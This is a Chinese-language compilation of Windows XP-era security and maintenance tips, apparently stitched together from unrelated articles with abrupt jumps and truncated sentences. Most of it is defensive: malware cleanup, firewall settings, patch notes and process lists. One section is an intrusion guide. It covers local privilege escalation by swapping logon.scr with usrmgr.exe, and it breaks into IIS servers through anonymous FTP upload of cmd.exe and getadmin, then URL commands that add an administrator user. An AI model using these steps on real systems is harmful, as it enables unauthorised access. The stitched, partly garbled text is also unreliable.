极客家园

　　       在Windows系统中，我们难免会遇到用常规方法无法删除文件的情况。尤其是Windows XP的用户，遭遇此类问题的频率更高。我们将尝试通过各种非常规的手段有效地删除那些顽固文件

　　一、删除顽固文件的常规方法

　　1.重新启动Windows操作系统后，再按常规方式删除文件。

　　2.在DOS(或命令提示符)界面中用Del、Deltree之类的命令删除。

　　3.利用非Windows资源管理器的第三方工具删除，例如具有浏览文件夹功能的Total Commander、acdsee、FlashFXP、nero等软件。

　　4.如果你安装了两个以上的

　　操作系统，那么就可以在当前系统中删除其它操作系统的文件。

　　5.在启动时按F8键选择进入安全模式执行删除操作。

　　二、删除“其它程序正在使用”的文件

　　问题表现：

　　Windows XP系统中，准备删除一个大容量的AVI格式文件，但系统却总是提示无法执行删除操作，有别的程序在使用，即使刚开机进入Windows系统时也是如此。

　　问题解决：

　　方法1：打开记事本，点击菜单栏“文件”→“另存为”，命名文件和你想删除的那个文件名一致(包括扩展名)，而后进行替换，会发现容量变为0 KB了。此时，执行删除命令即可。

昨天将U盘插到电脑后双击无法打开，紧接着双击所有驱动器盘符都没有办法打开，试验以后发现只有使用资源管理器可以。但终究不爽，鬼知道病毒在电脑里还干了些什么，决定彻底杀掉。

症状描述

1.双击驱动器盘符无法打开，资源管理器可以使用。

2.在开始→运行里输入cmd进入命令行模式，输入 C:回车 ，进入C盘根目录，输入 dir /a 查看所有文件，发现存在如下两个文件： Autorun.inf RavMon.exe。

3.在开始→运行里输入msconfig，进入系统配置程序，选择“启动”标签，里面有一个叫做 “MDM”的项指向“C:\windows\mdm.exe”。

解决方法

1.重新启动，开机时按F8，进入带命令行的安全模式，选择Administrator账号登陆。

2.在命令行下输入regedit进入注册表，查找”RavMon.exe”，如果发现匹配项就删除(我 没有发现，这样做是保险起见)。注意RsRavMon是瑞星杀毒软件，不用删除。

3.在命令行下输入msconfig，进入系统配置程序，选择“启动”标签，将所有“MDM”项前面 的勾去掉保存。

4.在命令行下输入以下指令

del C:\Autorun.inf /f /s /q /a del C:\RavMon.exe /f /s /q /a del D:\Autorun.inf /f /s /q /a del D:\RavMon.exe /f /s /q /a ……

       ICF 又称 Windows 防火墙(Windows Firewall)在开始－控制面板－网络连接点击本地连接，右键－属性－高级－设置－常规中可以看到启用已经被选中(或者是直接在控制面板中选择 Windows 防火墙也可)

　　点选例外，可以看到计算机中的一些程序已经被勾选象 MSN Messenger，Skype，远程协助等等

　　Internet 连接防火墙的增强特性

　　Windows XP Service Pack 2（SP2）包含多项有关 Internet 连接防火墙的重要增强特性。ICF 又称 Windows 防火墙（Windows Firewall），是一种能够阻截所有传入的未经请求的流量的状态防火墙。这些流量既不是响应计算机请求而发送的流量（请求流量），也不是事先指定允许传入的未经请求的流量（异常流量）。ICF 提供了一个强大的保护层，可以阻止恶意用户和程序依靠未经请求的传入流量攻击计算机。

　　在 Windows XP（早于 SP2 的版本）中，所有连接都默认禁用 ICF，除非通过“网络设置向导”（Network Setup Wizard）或“Internet 连接向导”（Internet Connection Wizard）进行更改。可以手动对每个连接启用 ICF，即选中连接属性的“高级”选项卡上的一个单一复选框。在该选项卡上，您还可以通过指定传输控制协议（Transmission Control Protocol，TCP）或用户数据报协议（User Datagram Protocol，UDP）端口来配置异常流量集合。

　　在 Windows XP SP2 中，ICF 有了许多变化，包括：

　　计算机的所有连接默认启用 ICF

　　应用于所有连接的新增全局配置选项

　　全新的本地配置对话框集合

　　全新的屏蔽模式

　　启动安全性

　　本地子网限制

　　可以通过应用程序文件名指定异常流量

　　对于 IPv6 ICF 的内建支持

　　有关 Netsh 和组策略（Group Policy）的新增配置选项

　　 　　随着WAP手机技术的日趋成熟，接入互联网轻松获得大量的信息已成为未来手机发展的必然趋势。而且随着配备Java功能的i模式手机登场，手机接入互联网更为便捷，势必会因此增加手机感染病毒的机会。由于通过网络直接对WAP手机进行攻击比对GSM手机进行攻击更加简便易行，WAP手机已经成为电脑黑客攻击的重要对象。 　

　　黑客对手机进行攻击，通常采用以下三种方式：一是攻击WAP服务器，使WAP手机无法接收正常信息；二是攻击和控制“网关”，向手机发送垃圾信息(严格地说，以上两种手机病毒还属于电脑病毒，不会破坏手机本身)；三是直接攻击手机本身，使手机无法提供服务。新一代的WAP手机由于其功能的多元化，因此病毒带来的灾害也会更大。侵袭WAP手机的病毒可能会自动启动电话录音功能、自动拨打电话、删除手机上的档案内容，甚至会制造出金额庞大的电话账单。

　　要避免手机感染病毒，用户在使用手机时要采取适当的措施：

　　1、关闭乱码电话

　　当对方的电话拨入时，屏幕上显示的应该是来电电话号码，结果却显示别的字样或奇异符号。如果遇到上述情形，用户应不回答或立即把电话关闭。如接听来电，则会感染上病毒，同时机内所有新名词及设定将被破坏。

　　2、尽量少从网上下载信息
　　
　　病毒要想侵入且在流动网络上传送，要先破坏掉手机短信息保护系统，这本非容易的事情。但随着3G时代的来临，手机更加趋向于一台小型电脑，有电脑病毒就会有手机病毒，因此从网上下载信息时要当心感染病毒。

　　3、注意短信息中可能存在的病毒

　　短信息的收发作为移动通讯的一个重要方式，也是感染手机病毒的一个重要途径。如今手机病毒的发展已经从潜伏期过渡到了破坏期，短信息已成为下毒的常用工具。手机用户一旦接到带有病毒的短信息，阅读后便会出现手机键盘被锁，甚至破坏手机IC卡等严重效果。

　　4、对手机进行查杀病毒
　　
　　目前查杀手机病毒的主要技术措施有两种：一是通过无线网站对手机进行杀毒；二是通过手机的IC接入口或红外传输口进行杀毒。在i模式手机中，为了禁止非法利用该功能，可采取以下的安全性措施：（1）将执行Java小程序的内存和存贮电话簿等功能的内存分割开来，从而禁止小程序访问；（2）已经下载的Java小程序只能访问保存该小程序的服务器；（3）当小程序试图利用手机的硬件功能（如使用拨号功能打电话时）便会发出警告等。

　　手机病毒因手机网络联系密切，影响面广，破坏力强，故不可掉以轻心。但也不必因噎废食，只要做足防范措施，便可放心使用。

　　 　　Windows XP凭借极高的安全性和稳定性，赢得了广大用户的青睐。我们可以通过建立个人账户、设定密码来保护自己的个人隐私，还可以用Administrators(超级管理员)的身份任意设置账户，为每一个账户设置不同的权限，可以说拥有至高无上的权利，也拥有系统的“生杀大权”，享有系统最高级别的安全保障。

　　但是，如果我告诉你，我能不费吹灰之力就可以将你这个Administrators给废掉，取而代之的是我成为Administrators，你信不信?呵呵，你不信？好，我们来试一试：

　　步骤一 重新启动计算机，在出现启动菜单时按F8键进入高级选项菜单，选择“安全模式”进入系统；

　　步骤二 打开“控制面板”，找到“用户和密码”选项，看看是不是账户中包括Administrators？好，现在将Administrators账户删除，重新创建一个Administrators，或是更改原来的Administrators账户密码；

　　步骤三 重新启动计算机后，只有输入新的密码才能登录Windows XP。

　　为什么会出现这种问题呢？原因很简单：Windows XP真正的超级管理员账号应该是在安全模式下的Administrators，并不是在正常模式下的Administrators。在默认情况下，安全模式下的Administrators密码为空。无论用户在正常模式下将Administrators密码设置得多么复杂，安全性多么高，如果没有设置安全模式下的Administrators密码，你的电脑将毫无秘密可言。

　　现在，你是不是对Windows XP的安全性有些担忧了?那怎么办?这还不简单：赶紧进入安全模式，设置Administrators密码，将自己提升为真正的Administrators!当然，这次设置的密码要记牢了，否则下次你就真的无法进入Windows XP了！

补丁相关:微软IE所有版本都有必要对该补丁进行升级。此次代号为MS05-054的安全补丁，用于修复以前的IE安全漏洞，当未安装安全补丁的用户在执行含有攻击代码的恶意网站页面时，会在新浏览窗口出现“文件下载”对话框。如果受骗双击新窗口的特定区域，则该键盘动作就会传送给隐藏的“文件下载”对话框中的“运行”键，导致无意中运行攻击者所提供的程序。补丁安装完成后计算机将重新启动，而利用此漏洞的网页将不会被自动执行。
补丁下载:针对Windows XP SP2 +IE6.0补丁为http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=E4B5BA57-D4F2-4798-9154-2869E371C9D1
针对Windows 2000 SP4+IE5.0补丁为http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=4005B74A-D6E6-4A32-A3B1-276686B4A428

病毒信息:新年之星病毒针对微软数个漏洞进行攻击
新年刚刚来临，代号新年之星的病毒程序也被发现，该病毒程序利用今年10月微软公布的MS05-051(MSDTC和COM+服务)漏洞及MS05-04(IE下载进程)漏洞，对用户计算机的TCP端口1025与445进行攻击。这一攻击利用该漏洞执行病毒代码，造成目标系统缓冲区溢出，并自动添加一个用户名为TS-USERS的隐藏管理员，运行病毒进行传播。由于该病毒程序具备主动攻击的特性，所以只要在网络中的未进行升级更新用户计算机都有可能受到此病毒的恶意攻击，预计在一月份利用此原理的病毒程序将会造成相当严重的破坏，希望广大用户及时更新补丁。
临时解决方案:如果读者不能立刻安装补丁或者升级，推荐采取以下措施以降低威胁:①在IE浏览器中禁用所有Internet和本地Intranet安全区中禁用活动脚本;②将Internet和本地Intranet安全区设置为“高”。
如果读者的计算机已经对浏览器进行升级，但不知道自己的计算机是否被病毒攻击过，可以从http://www.newhua.com/cfan/200602/yczh.rar下载全智能的克隆隐藏用户检测程序，所有隐藏以及克隆用户都会在该软件的菜单中显示名称、权限以及是否为克隆用户。

　　 　　一款好的防火墙并不能发现所有病毒；一个好的杀毒软件并不能歼灭所有的带毒程序！遇到这些情况我们该做何处理呢？很简单——手工杀毒。而要论到手工杀毒，就不能不提到系统进程的妙用了。
　　
　　进程、病毒？
　　书上说：“进程为应用程序的运行实例，是应用程序的一次动态执行。”看似高深，我们可以简单地理解为：它是操作系统当前运行的执行程序。在系统当前运行的执行程序里包括：系统管理计算机个体和完成各种操作所必需的程序；用户开启、执行的额外程序，当然也包括用户不知道，而自动运行的非法程序（它们就有可能是病毒程序）。
　　
　　危害较大的可执行病毒同样以“进程”形式出现在系统内部（一些病毒可能并不被进程列表显示，如“宏病毒”），那么及时查看并准确杀掉非法进程对于“手工杀毒有起着关键性的作用。
　　
　　操作系统如何打开进程列表？
　　要通过进程列表查看系统是否染毒，必须打开当前的执行程序进程列表，Microsoft的每种系统都有相应的打开方法，但能够显示的能力却因（系统）不同，有所差异：
　　
　　1.　Windows 98 /Me系统
　　
　　打开系统进程的方式很简单，快捷键“Ctrl+Alt+Delete”（如图1），这个窗口大家应该比较熟悉，使用Windows系统的用户都知道用这个方法来关闭程序，不过它同样用于显示系统进程，只是Windows 98系统较初级，对进程的显示局限于名称，且里面所显示的还有打开的文件及目录名，查看时易混淆。Windows Me的进程打开方式和Windows 98相同。
　　
　　Windows 9x系统打开的进程列表混乱且不完全，显然不便于查看系统的具体进程状况，所以建议使用一些工具程序来为Windows 9x系统显示进程，如“Windows优化大师”，在“优化大师”的“系统安全优化”项内打开“进程管理”，在图2所示的“Windows 进程管理”窗口内，可以详细查看当前计算机所运行的所有进程，及具体程序所在的位置，这样更方便完成后面要介绍的如何利用进程进行查毒、杀毒。
　　
　　2.　Windows 2000/ XP/2003系统
　　
　　Windows 2000、Windows XP、Windows 2003打开进程窗口的方式与Windows 9x系统相同，只是三键后打开的是“Windows 任务管理器”窗口，需要选择里面的“进程”项。Windows 2000系统只显示具体进程的全名，占用的内存量；Windows XP、Windows 2003系统相比Windows 2000会显示该进程归属于那个用户下，如操作系统所必须的基础程序，会在后面的“用户名”内显示为“SYSTEM”，由用户另外开启的程序则用户名为当前的系统登录用户名。
　　
　　通过进程发现、处理病毒
　　在介绍具体的查毒和杀毒前，笔者先回答开篇提出的两个问题。为什么杀毒软件并不能全面的查找和杀掉病毒？首先，病毒防火墙是通过对程序进行反汇编，然后与自己的病毒库进行对比来查找病毒，如果病毒较新，而杀毒软件又未能及时升级便不能识别病毒。其次，杀毒软件在发现病毒后，如果是独立的可执行病毒程序，会选择直接删除的处理方式，而病毒如果被当作进程执行了，杀毒软件就无能为力了，因为它没有功能和权限先停止掉系统的这些进程，被当作进程执行的程序是不能被删除的（这也是大家在删除一个程序时，提示该程序正在被使用不能删除的原因）。所以在使用杀毒软件杀毒时，才会有杀毒完成后，又出现病毒提示的原因。
　　
　　回到原来话题上！通过进程如何发现和杀掉病毒呢？由前面的知识介绍可知，Windows 9X和Windows 2000系统只能显示进程的名称，这对判断该进程是否是病毒还不够，如果要准确的断定病毒，最好使用前面介绍的“Windows优化大师”来查看进程程序的源路径，如果是“C:\windows\system”下的一些未知的“EXE”那便极有病毒的可能性了。Windows XP和Windows 2003系统，进程后会有“用户名”的显示，病毒是不可能获得“SYSTEM”权限的，所以应注意“用户名”是当前登录用户的进程，一旦发现是病毒，可以立即“杀掉”。这里介绍两个技巧：
　　
　　1．发现可疑进程后，利用Windows的查找功能，查找该进程所在的具体路径，通过路径可以知道该进程是否合法，譬如由路径“C:\Program Files\3721\assistse.exe”知道该程序是3721的进程，是合法的。
　　
　　2．在对进程是否病毒拿不定主意时，可以复制该进程的全名，如：“xxx.exe”到googl.com或baidu.com这样的全球搜查引擎上进行搜查，如果是病毒会有相关的介绍网页。
　　
　　确定了该进程是病毒，首先应该杀掉该进程，对于Windows 9x系统，选中该进程后，点击下面的“结束任务”按钮，Windows 2000、Windows XP、Windows 2003系统则在进程上单击右键在弹出菜单上选择“结束任务”。“杀掉”进程后找到该进程的路径删除掉即可，完成后最好在进行一次杀毒，这样就万无一失了。
　　
　　一次利用进程杀毒的具体过程是这样的：“通过进程名及路径判断是否病毒——杀掉进程——删除病毒程序”，为了让读者更好的判断进程，在这里补充一些Windows的进程资料给大家：
　　
　　进程名描述
　　
　　smss.exeSessionManager
　　
　　csrss.exe 子系统服务器进程
　　
　　winlogon.exe管理用户登录
　　
　　services.exe包含很多系统服务
　　
　　lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
　　
　　svchost.exe Windows 2000/XP 的文件保护系统
　　
　　SPOOLSV.EXE 将文件加载到内存中以便迟后打印。
　　
　　explorer.exe资源管理器
　　
　　internat.exe托盘区的拼音图标
　　
　　mstask.exe允许程序在指定时间运行。
　　
　　regsvc.exe允许远程注册表操作。(系统服务)→remoteregister
　　
　　tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。
　　
　　llssrv.exe证书记录服务
　　
　　ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。
　　
　　RsSub.exe 控制用来远程储存数据的媒体。
　　
　　locator.exe 管理 RPC 名称服务数据库。
　　
　　clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。
　　
　　msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统或其他事务保护资源管理器。
　　
　　grovel.exe扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间（只对 NTFS 文件系统有用）。
　　
　　snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。
　　
　　以上这些进程都是对计算机运行起至关重要的，千万不要随意“杀掉”，否则可能直接影响系统的正常运行。

    如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:

    先把c:\winnt\system32下的logon.scr改名为logon.old备份

    然后把usrmgr.exe改名为logon.scr

    然后重新启动

    logon.scr是启动时加载的程序，重新启动后，不会出现以往的登陆密码输入界面，而是用户管理器。

    这时他就有权限把自己加到Administrator组

    不要忘记把文件名改回来啊!

    之二:

    下面的技术适用于不重视NT网络安全的网站,

    一些 http的技术也可以供较高级的人员参考

    进入NT网络可以采取下面的步骤:

    因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的，有些anonymous的帐号还有upload权限，我们就要攻击这类站点。因为如果不允许匿名帐号，就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

    正因为允许匿名帐号ftp登陆的设定，也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

    ftp www.xxx.com

    Connected to www.xxx.com

    ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下，必然会有一个IUSER_ntsvr2的用户帐号，属于Domain user组，这个帐号我们以后要用来获取Administrator的权限。

    User (www.xxx.comnone)):anonymous

    Password: 输入 guest@ 或者guest

    对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止，或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组。

    在这种情况下我们就可以进NT server的ftp了。

    进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功，这时你就有了80%的把握。

    现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

    把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

    然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

    大约十多秒后屏幕显示:

    CGI Error

    这时有90%的可能是：你已经把IUSER_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。

    下面可以add user:

    http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32et.exe user china news /add

    这样就创建了一个叫china用户,密码是news,然后:

    http://www.xxx.com/cgi-bin/getadmin.exe?china

    或者

    http://www.xxx.com/scripts/tools/getadmin.exe?china

    你再用china的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。

恶意代码是一种程序，它通过把代码在不被察觉的情况下镶嵌到另一段程序中，从而达到破坏被感染电脑数据、运行具有入侵性或破坏性的程序、破坏被感染电脑数据的安全性和完整性的目的。按传播方式，恶意代码可以分成五类：病毒，木马，蠕虫，移动代码和复合型病毒.

1， 病毒

病毒一般都具有自我复制的功能，同时，它们还可以把自己的副本分发到其他文件、程序或电脑中去。病毒一般镶嵌在主机的程序中，当被感染文件执行操作的时候，病毒就会自我繁殖（例如：打开一个文件，运行一个程序，点击邮件的附件等）。由于设计者的目的不同，病毒也拥有不同的功能，一些病毒只是用于恶作剧，而另一些则是以破坏为目的，还有一些病毒表面上看是恶作剧病毒，但实际上隐含破坏功能。病毒可以分为以下几类：感染文件病毒、感染引导区病毒、宏病毒和恶作剧电子邮件。

* 感染文件病毒：感染文件病毒会把自己加载到可执行文件中，例如：WORD、电子表格、电脑游戏。当病毒感染了一个程序后，它就会自我复制去感染系统中的其他程序，或者是其他通过共享使用了被感染文件的系统。此外，病毒还会驻留在系统内存中，以至于一旦有新的程序运行就会被病毒感染。病毒的另一种感染方式是通过修改程序运行时所执行文件的顺序而不是修改程序运行的文件本身。在这种情况下，被感染的程序在执行的时候将先运行病毒，而后才运行自己的文件。目前，jerusalem和cascade是这类病毒中比较著名的。

* 感染引导区病毒：感染引导区病毒可以感染硬盘或是可移动存储设备（例如软盘）的主引导区。引导区是存储器最开始的一段空间，它用来放置存储器中数据的结构定义等信息。此外，引导区中还包含引导程序，它在主机启动时运行来引导操作系统启动。主引导区是硬盘上一段独立的空间，只有用基本输入/输出系统可以定位和加载它的引导程序。当带病毒磁盘的内容在系统启动时被读取，病毒代码就会被执行；软盘等可移动存储设备即使不是启动盘，它也可以感染系统。感染引导区病毒具有极好的隐藏能力，并且可以对电脑造成极大的破坏,甚至可以达到无法恢复的地步。电脑如果感染这种病毒，一般会出现以下症状：电脑在启动时显示错误信息提示，或者是无法启动。Michelangelo和Stoned是这种病毒的典型例子。

* 宏病毒：宏病毒是目前比较流行也是比较危险的一种病毒。宏病毒把自己加载到WORD和电子表格等文件中。这种病毒就像它的名字所说的，它是利用宏语言编写的应用程序来运行和繁殖的。目前许多受欢迎的软件（例如：Microsoft Office）都会自动利用宏语言来编译和反复执行作业。宏病毒就会利用这一点来传播恶意代码。由于用户经常把带有宏程序的文件共享，所以宏病毒的传播速度是非常快的。当宏病毒感染文件的时候，它也会把该文件用于创建和打开操作的临时文件感染。因此，被宏病毒感染的文件创建出的临时文件也是被感染的文件。Marker和Melissa是这种病毒的典型例子。

* 恶作剧电子邮件：这种病毒就像它的名字提到的一样，是一种假冒的病毒警告。它的内容一般是恐吓用户，表示将要对用户电脑造成极大的破坏；或是欺骗用户电脑即将被病毒感染，警告他们立即采取紧急措施。尽管这种病毒发布的信息是非法的，但是它还是像真正的病毒一样传播广泛。通常这种病毒的传播是通过一些无辜的用户，他们希望发送这个信息提醒其他人防范病毒的侵袭。通常，恶作剧邮件并不会造成什么危害，但是有的恶作剧邮件会指使用户修改系统设置或是删除某些文件，这将会影响系统的安全性。阅读恶作剧邮件会浪费用户时间，而且一些恶作剧邮件会发送到一些技术支持的部门，警告他们将会有新的病毒威胁网络安全或是寻求帮助。这种病毒传播比较广泛的有Good Times和Bud Frogs。

2， 特洛伊木马

这类病毒是根据古希腊神话中的木马来命名的，这种程序从表面上看没有什么，但是实际上却隐含着恶意意图。一些木马程序会通过覆盖系统中已经存在的文件的方式存在于系统之中，同时它可以携带恶意代码，还有一些木马会以一个软件的身份出现（例如：一个可供下载的游戏），但它实际上是一个窃取密码的工具。这种病毒通常不容易被发现，因为它一般是以一个正常的应用的身份在系统中运行的。特洛伊木马可以分为以下三个模式：

* 通常潜伏在正常的程序应用中，附带执行独立的恶意操作

* 通常潜伏在正常的程序应用中，但是会修改正常的应用进行恶意操作

* 完全覆盖正常的程序应用，执行恶意操作

大多数木马都可以使木马的控制者登录到被感染电脑上，并拥有绝大部分的管理员级控制权限。为了达到这个目的，木马一般都包括一个客户端和一个服务器端客户端放在木马控制者的电脑中，服务器端放置在被入侵电脑中，木马控制者通过客户端与被入侵电脑的服务器端建立远程连接。一旦连接建立，木马控制者就可以通过对被入侵电脑发送指令来传输和修改文件。通常木马所具备的另一个是发动DdoS(拒绝服务)攻击。

还有一些木马不具备远程登录的功能。它们中的一些的存在只是为了隐藏恶意进程的痕迹，例如使恶意进程不在进程列表中显示出来。另一些木马用于收集信息，例如被感染电脑的密码；木马还可以把收集到的密码列表发送互联网中一个指定的邮件帐户中。

3， 蠕虫

是一种可以自我复制的完全独立的程序，它的传播不需要借助被感染主机中的其他程序。蠕虫的自我复制不象其他的病毒，它可以自动创建与它的功能完全相同的副本，并在没人干涉的情况下自动运行。蠕虫是通过系统存在的漏洞和设置的不安全性（例如：设置共享）来进行入侵的。它的自身特性可以使它以及快的速度传输（在几秒中内从地球的一端传送到另一端）。其中比较典型的有Blaster和SQL Slammer。

4， 移动代码

移动代码是能够从主机传输到客户端计算机上并执行的代码，它通常是作为病毒，蠕虫，或是特洛伊木马的一部分被传送到客户计算机上的。另外，移动代码可以利用系统的漏洞进行入侵，例如非法的数据访问和盗取root帐号。通常用于编写移动代码的工具包括Java applets，ActiveX，javascript，和VBScript。

5.复合型病毒

复合型病毒就是恶意代码通过多种方式传播。著名的Nimda蠕虫实际上就是复合型病毒的一个例子，它通过四种方式传播：

* E-Mail：如果用户在一台存在漏洞的电脑上打开一个被Nimda感染的邮件附件，病毒就会搜索这台电脑上存储的所有邮件地址，然后向它们发送病毒邮件。

* 网络共享：Nimda会搜索与被感染电脑连接的其他电脑的共享文件，然后它以NetBIOS作为传送工具，来感染远程电脑上的共享文件，一旦那台电脑的用户运行这个被感染文件，那么那台电脑的系统也将会被感染。

* Web服务器：Nimda会搜索Web服务器，寻找Microsoft IIS存在的漏洞，一旦它找到存在漏洞的服务器，它就会复制自己的副本过去，并感染它和它的文件。

* Web终端：如果一个Web终端访问了一台被Nimda感染的Web服务器，那么它也将会被感染。

除了以上这些方法，复合型病毒还会通过其他的一些服务来传播，例如直接传送信息和点对点的文件共享。人们通常将复合型病毒当成蠕虫，同样许多人认为Nimda是一种蠕虫，但是从技术的角度来讲，它具备了病毒，蠕虫和移动代码它们全部的特征。

最近在论坛上不断看到有网友求助

磁盘分区不能双击打开；

插入U盘导致感染病毒；

中了病毒后明明完全重装了系统（指格式化系统盘后重装 或者是ghost恢复 下同），但是病毒依然横行。本文将教你导致这些现象的原因，对应的防守策略及解决方法。

首先说说磁盘双击不能打开的原理吧

我们来做个实验，将一个可执行文件放在某个分区的根部录下。例子中是打字练习这个软件。然后我们打开记事本 然后输入

[autorun]

OPEN=打字软件.exe open=输入你的可执行文件的文件名

然后把它保存为名为Autorun.inf文件 也放在该分区的根目录下 如图1

接下来重启电脑，然后双击该分区，原本是要进入该分区的，但是却执行了你的可执行文件。在盘符上单击右键可以看到多了一个自动播放，如果该可执行文件是个病毒的话，那后果就是。

这就是磁盘分区不能双击打开；插入U盘导致感染病毒的原理。

可以看出Autorun.inf文件就是这类病毒的加载途径

有些网友会问 “我看不到有这个病毒呀” 那是因为病毒作者给该文件赋了隐藏属性。

接着网友又会问 “我也选择了显示所有文件呀” 病毒作者为了达到隐藏的目的，修改了注册表中显示隐藏文件的相关选项，使得你即使选择了显示所有文件，也无法达到显示隐藏文件的目的。这里作者提供了相关的修复显示隐藏文件的注册表修复文件供大家下载，点击下载，你下载并运行了该文件后就可以看到被隐藏的Autorun.inf文件了。

知道了原理，我们来防范此类病毒。

首选方法：组策略法 （该方法适用于xp专业版用户，xp家庭版用户跳过）

具体操作方法 开始→运行→输入gpedit.msc→确定→计算机机配置→管理模板→系统关闭自动播放→已启用→所有驱动器→确定 如图2